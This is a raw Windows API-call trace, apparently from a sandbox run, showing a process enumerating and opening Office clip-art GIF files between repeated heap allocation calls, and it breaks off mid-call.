[0100.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d420 [0100.424] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.424] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0100.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0100.424] AreFileApisANSI () returned 1 [0100.424] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.424] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8ab20 [0100.424] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x8ab20, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 69 [0100.424] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00040_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.425] GetFileType (hFile=0x27c) returned 0x1 [0100.425] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0100.425] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0100.425] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0100.425] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0100.425] CloseHandle (hObject=0x27c) returned 1 [0100.425] AreFileApisANSI () returned 1 [0100.425] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.425] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a368 [0100.426] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x8a368, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 69 [0100.426] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00040_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.426] GetFileType (hFile=0x27c) returned 0x1 [0100.426] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a368 | out: hHeap=0x20000) returned 1 [0100.426] CloseHandle (hObject=0x27c) returned 1 [0100.426] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.426] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.426] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.426] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.426] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.426] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.426] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.426] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0100.426] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0100.426] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0100.426] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0100.426] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0100.426] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0100.426] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.426] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0100.426] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0100.426] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.426] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.426] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.426] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.426] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.426] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.427] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.427] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.427] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.427] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.427] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.427] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.427] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.427] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.427] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.427] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.427] AreFileApisANSI () returned 1 [0100.427] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.427] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a498 [0100.427] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d420, cbMultiByte=-1, lpWideCharStr=0x8a498, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF") returned 69 [0100.427] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00040_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00040_.gif"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb32840, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcb32840, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcb58a9e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1fa1)) returned 1 [0100.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a498 | out: hHeap=0x20000) returned 1 [0100.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.427] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d420 | out: hHeap=0x20000) returned 1 [0100.427] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.427] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.427] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbcb1a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1e06, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AG00052_.GIF", cAlternateFileName="")) returned 1 [0100.427] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.427] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0100.427] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0100.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0100.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0100.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0100.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35210 [0100.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35210 | out: hHeap=0x20000) returned 1 [0100.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0100.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f0b8 [0100.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0100.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a5c8 [0100.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f0b8 | out: hHeap=0x20000) returned 1 [0100.428] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.428] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.428] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.428] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0100.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.428] AreFileApisANSI () returned 1 [0100.428] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF", lpUsedDefaultChar=0x0) returned 69 [0100.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0100.428] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.428] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0100.428] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0100.429] AreFileApisANSI () returned 1 [0100.429] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.429] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a530 [0100.429] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x8a530, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 69 [0100.429] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00052_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.467] GetFileType (hFile=0x368) returned 0x1 [0100.467] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0100.468] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0100.468] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0100.472] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0100.477] CloseHandle (hObject=0x368) returned 1 [0100.478] AreFileApisANSI () returned 1 [0100.478] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.478] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a2d0 [0100.478] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x8a2d0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 69 [0100.479] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00052_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0100.480] GetFileType (hFile=0x368) returned 0x1 [0100.480] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a2d0 | out: hHeap=0x20000) returned 1 [0100.480] CloseHandle (hObject=0x368) returned 1 [0100.481] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.481] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.481] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.481] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.481] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.481] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.481] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.481] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0100.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0100.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0100.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0100.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0100.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0100.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0100.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0100.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.482] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.482] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.516] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.516] AreFileApisANSI () returned 1 [0100.516] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 69 [0100.516] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8a) returned 0x8a9f0 [0100.516] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x8a9f0, cchWideChar=69 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF") returned 69 [0100.516] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00052_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00052_.gif"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcbcb1a5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xcbcb1a5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xcbcb1a5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1e06)) returned 1 [0100.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a9f0 | out: hHeap=0x20000) returned 1 [0100.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0100.517] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.517] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.517] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdb709c6, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdb709c6, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdb96b67, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2e73, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AG00057_.GIF", cAlternateFileName="")) returned 1 [0100.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0100.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0100.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0100.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0100.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0100.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0100.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0100.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0100.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0100.517] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0100.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0100.517] RtlAllocateHeap 